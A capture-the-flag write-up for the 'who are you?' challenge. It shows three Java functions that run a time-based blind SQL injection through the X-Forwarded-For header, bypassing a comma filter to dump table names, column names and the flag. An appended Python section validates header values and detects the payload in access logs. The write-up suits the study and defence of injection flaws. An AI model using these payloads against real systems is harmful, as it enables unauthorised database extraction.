1. The challenge says the value is recorded to the DB and is tied to the IP, so the likely entry point is the XFF (X-Forwarded-For) header.

2. Tried error-based injection, but nothing was echoed back, so I used Burp to try a blind injection instead.

西普CTF-who are you?-以夕阳落款

The response was indeed delayed by 3 seconds.

3. Fed this request to sqlmap, but it could not extract anything. Suspecting a filter, I eventually found that the comma character (,) is filtered.

4. Tried writing my own script (Java, HttpClient 4.5).

4.1 Get the tables

import java.io.IOException;

import org.apache.http.HttpEntity;
import org.apache.http.ParseException;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;

// Enumerate the table names one character at a time through the X-Forwarded-For header.
// Each request asks whether character m of group_concat(table_name) has ASCII code i;
// a true answer costs SLEEP(4), so a response slower than 4000 ms confirms that character.
public static void getTable() throws ClientProtocolException, IOException
{
	String table = "";
	for (int m = 1; m < 20; m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		CloseableHttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		// SUBSTRING(... FROM m FOR 1) is used because the target filters the comma
		get.addHeader("X-Forwarded-For", " aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select group_concat(table_name) from information_schema.tables where table_schema=database()) FROM " + m + " FOR 1))=" + i + ")"
				+ " THEN SLEEP(4) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = client.execute(get);

		HttpEntity entity = response.getEntity();

		String body = EntityUtils.toString(entity, "UTF-8");
		response.close();  // release the connection before the next request
		client.close();

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1) + "ms,i=" + i + "   " + table);
		if ((t2 - t1) > 4000)
		{
			table = table + (char) i;
			System.out.println(table);
			break;
		}
	}
}

This turns up two tables: cilent_ip and flag.

4.2 Get the columns

// Same HttpClient 4.5 setup as getTable(), this time enumerating the column names of
// table flag. SLEEP(5) is used here, so the threshold is 5000 ms.
public static void getcolumn() throws ClientProtocolException, IOException
{
	String columns = "";
	for (int m = 1; m < 20; m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		CloseableHttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		get.addHeader("X-Forwarded-For", " aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select group_concat(column_name) from information_schema.columns where table_name='flag') FROM " + m + " FOR 1))=" + i + ")"
				+ " THEN SLEEP(5) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = client.execute(get);

		HttpEntity entity = response.getEntity();

		String body = EntityUtils.toString(entity, "UTF-8");
		response.close();  // release the connection before the next request
		client.close();

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1) + "ms,i=" + i + "   " + columns);
		if ((t2 - t1) > 5000)
		{
			columns = columns + (char) i;
			System.out.println(columns);
			break;
		}
	}
}

This yields a single column named flag.

4.3 Extract the flag

// Same approach as getTable(), reading the flag column of table flag character by
// character. SLEEP(6) is used here, so the threshold is 6000 ms; m goes up to 50
// because the flag is longer than the table and column names.
public static void getflag() throws ParseException, IOException
{
	String flag = "";
	for (int m = 1; m < 50; m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		CloseableHttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		get.addHeader("X-Forwarded-For", " aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select flag from flag) FROM " + m + " FOR 1))=" + i + ")"
				+ " THEN SLEEP(6) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = client.execute(get);

		HttpEntity entity = response.getEntity();

		String body = EntityUtils.toString(entity, "UTF-8");
		response.close();  // release the connection before the next request
		client.close();

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1) + "ms,i=" + i + "   " + flag);
		if ((t2 - t1) > 6000)
		{
			flag = flag + (char) i;
			System.out.println(flag);
			break;
		}
	}
}

The flag is 32 characters long and came out fully.

(Because of network latency, a longer sleep gives a more reliable result. The injection has to use or; and does not work here.)
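The defender-side counterpart to the weakness above, added here and not part of the writeup: the application stored the X-Forwarded-For value unvalidated, so the fix is to accept only a literal IP chain before anything is recorded, and to flag the time-based probe pattern in access logs. The log line format, the single-trusted-proxy assumption and the sample lines are constructed for this example.

```python
import ipaddress
import re

# Syntax of the writeup's time-based payload (CASE WHEN ... SLEEP(n)), matched case-insensitively.
TIME_BASED_RE = re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(|\bcase\s+when\b", re.IGNORECASE)

def validate_xff(header):
    """Return the IPs of an X-Forwarded-For value as a list, or None if any comma-separated
    entry is not a literal IPv4/IPv6 address; a failing value must never reach the database."""
    try:
        return [str(ipaddress.ip_address(e.strip())) for e in header.split(",")]
    except ValueError:
        return None

def client_ip_to_store(xff_header, remote_addr):
    """Value the logging INSERT should record (as a bound parameter, never concatenated).
    Assumes exactly one trusted reverse proxy, so the rightmost XFF entry is the one it
    appended; on a missing or malformed header fall back to the TCP peer address."""
    ips = validate_xff(xff_header) if xff_header else None
    return ips[-1] if ips else remote_addr

# Constructed log format: remote_addr "xff header" status durationms
LOG_LINE_RE = re.compile(r'^(\S+) "(.*)" (\d{3}) (\d+)ms$')

def flag_xff_probes(log_lines, slow_ms=3000):
    """Return (line_no, reason) pairs: 'sqli-pattern' for time-based payload syntax in XFF,
    'xff-not-ip' for a non-address value, 'slow' when the response took at least slow_ms."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        xff, elapsed = m.group(2), int(m.group(4))
        if TIME_BASED_RE.search(xff):
            findings.append((n, "sqli-pattern"))
        elif validate_xff(xff) is None:
            findings.append((n, "xff-not-ip"))
        if elapsed >= slow_ms:  # the SLEEP side channel shows up as latency on the server too
            findings.append((n, "slow"))
    return findings

# Constructed sample lines; line 3 mirrors the shape of the writeup's payload.
SAMPLE_LOG = [
    '203.0.113.7 "203.0.113.7" 200 41ms',
    '198.51.100.2 "10.0.0.5, 198.51.100.2" 200 38ms',
    "192.0.2.9 \" aa' or (SELECT CASE WHEN (Ascii(SUBSTRING((select flag from flag)"
    " FROM 1 FOR 1))=102) THEN SLEEP(6) ELSE SLEEP(0) END ) and 'a'='a\" 200 6012ms",
    '192.0.2.9 "unknown" 200 40ms',
]
```

Running flag_xff_probes(SAMPLE_LOG) reports line 3 twice (payload syntax and the 6 s delay) and line 4 once for a non-IP value.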

